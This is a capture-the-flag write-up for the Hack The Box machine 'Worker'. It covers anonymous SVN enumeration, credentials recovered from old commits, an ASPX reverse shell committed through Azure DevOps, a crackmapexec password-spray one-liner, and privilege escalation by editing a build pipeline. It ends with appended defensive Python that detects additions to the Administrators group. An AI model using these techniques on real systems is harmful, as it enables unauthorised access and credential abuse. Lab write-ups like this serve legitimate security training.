Worker - Easy Box running on Linux. Enumeration through SVN. DevOps on Azure! :)
ENUMERATION
NMAP
Let’s start NMAP first:
Nmap scan report for 10.10.10.203
Host is up (0.034s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
3690/tcp open svnserve Subversion
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 17 12:24:15 2021 -- 1 IP address (1 host up) scanned in 13.09 seconds
Port 80 is also open, but for some reason it did not show up in the NMAP scan. There is nothing there anyway, so let's enumerate SVN (Subversion).
SVN
luka@kali:~/htb/worker$ nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 10.10.10.203
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 12:31 CET
Nmap scan report for 10.10.10.203
Host is up (0.034s latency).
PORT STATE SERVICE
3690/tcp open svn
| svn-brute:
|_ Anonymous SVN detected, no authentication needed
Nmap done: 1 IP address (1 host up) scanned in 11.81 seconds
Subversion is a version-control repository with a commit history much like GitHub's, just simpler, and it is an Apache project. Link: https://en.wikipedia.org/wiki/Apache_Subversion
So let’s see what we can find:
svn ls svn://10.10.10.203/
So let’s read the moved.txt
EXPLOITATION
SVN Enumeration (continued)
Add devops.worker.htb to /etc/hosts and try to connect:
Without any password we cannot continue. There is also dimension.worker.htb but is just a static page.
Since SVN lets us look at older revisions, let's do that (using -r 1).
We can download those with checkout using the -r argument:
svn checkout -r 2 svn://10.10.10.203
Some credentials were found in deploy.ps1.
Using those credentials we can log in to devops.worker.htb.
Azure Dev Ops
Enumeration didn't bring much, apart from finding several repos in the SmartHotel360 project.
There is a way to inject a shell (aspx) into a repo and then call that file on the corresponding subdomain (alpha, spectral, …).
So let’s upload shell:
And commit
Create pull request
I had to add some work items (just randomly typed) otherwise "Complete" didn't work.
If everything worked correctly, we should see the file (remember to visit the right repository!)
curl http://spectral.worker.htb/win-rev-shell.aspx
Shell was popped
PRIVILEGE ESCALATION
Manual Enumeration
As expected, it is a low-privileged shell, but with some privileges!
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
I didn't try the different potatoes (Rogue, Juicy) since that is usually the unintended way to escalate privileges.
There is another share on the system.
After searching for a while, the following file was found:
The list of usernames/passwords was downloaded and will be used in a test with crackmapexec's winrm module. It is slow but it works! :)
cat credz | tr -d " " | awk -F"=" '{print "crackmapexec winrm 10.10.10.203 -u "$1 " -p "$2 " --local-auth -x whoami"}'
The user that worked in the password spray attempt above was robinsl.
There is not much that user can do on the system, but his credentials work for DevOps and he seems to have another project assigned.
Azure Dev Ops #2
Privilege escalation seems to require almost the same attack through Azure DevOps, although it will be different this time. I couldn't find a way to interact with the repos directly like before, but there is another way to execute code: through pipelines.
Azure Repos Git > PartsUnlimited > Starter Pipeline
Here we can add commands that will run as whichever user the agent service runs as (hopefully SYSTEM ;) ).
I've decided to add robinsl to the Administrators group since it is a more persistent way of escalating privileges than a reverse shell.
Then delete the pool and create a new branch.
If everything worked correctly, user robinsl should have been added to the "administrators" local group.
And yes. It has worked!
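From the defender's side, the pipeline step above leaves a clear trace on the host: a member being added to the local Administrators group is logged as Windows Security Event ID 4732, and the subject of that event is the agent's account (SYSTEM here), not an interactive admin. The following is an added example, not code from the write-up: it flags such events over constructed sample records (the SIDs, account names and the `SERVICE_SUBJECTS` list are assumptions).

```python
# Added example, not part of the original write-up: flag Windows Security
# Event ID 4732 (member added to a security-enabled local group) when the
# target group is local Administrators, escalating when the change was made
# from a service context such as SYSTEM, which is what a build agent running
# as SYSTEM looks like. All sample records are constructed; field names
# follow the 4732 event schema.

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of local Administrators

# Service contexts that should not normally edit local group membership (assumed list)
SERVICE_SUBJECTS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\NETWORK SERVICE",
                    "NT AUTHORITY\\LOCAL SERVICE"}

# Constructed sample events (dicts standing in for parsed EVTX/XML records)
SAMPLE_EVENTS = [
    # Resembles the pipeline step: SYSTEM adds an account to Administrators
    {"EventID": 4732, "SubjectDomainName": "NT AUTHORITY", "SubjectUserName": "SYSTEM",
     "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544",
     "MemberName": "-", "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1105"},
    # Routine change by a human admin to a different group
    {"EventID": 4732, "SubjectDomainName": "WORKER", "SubjectUserName": "helpdesk",
     "TargetUserName": "Remote Desktop Users", "TargetSid": "S-1-5-32-555",
     "MemberName": "-", "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1108"},
    # Unrelated event type, must be ignored
    {"EventID": 4624, "SubjectDomainName": "WORKER", "SubjectUserName": "robinsl"},
]


def admin_group_additions(events):
    """Return one alert dict per 4732 event that adds a member to local Administrators."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4732 or ev.get("TargetSid") != ADMINISTRATORS_SID:
            continue
        subject = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        # A service context editing Administrators matches the agent/pipeline pattern
        severity = "high" if subject.upper() in SERVICE_SUBJECTS else "medium"
        alerts.append({
            "severity": severity,
            "subject": subject,
            "member_sid": ev.get("MemberSid"),  # 4732 usually carries only the SID; resolve it
            "group": ev.get("TargetUserName"),
        })
    return alerts


if __name__ == "__main__":
    for a in admin_group_additions(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['subject']} added {a['member_sid']} to {a['group']}")
```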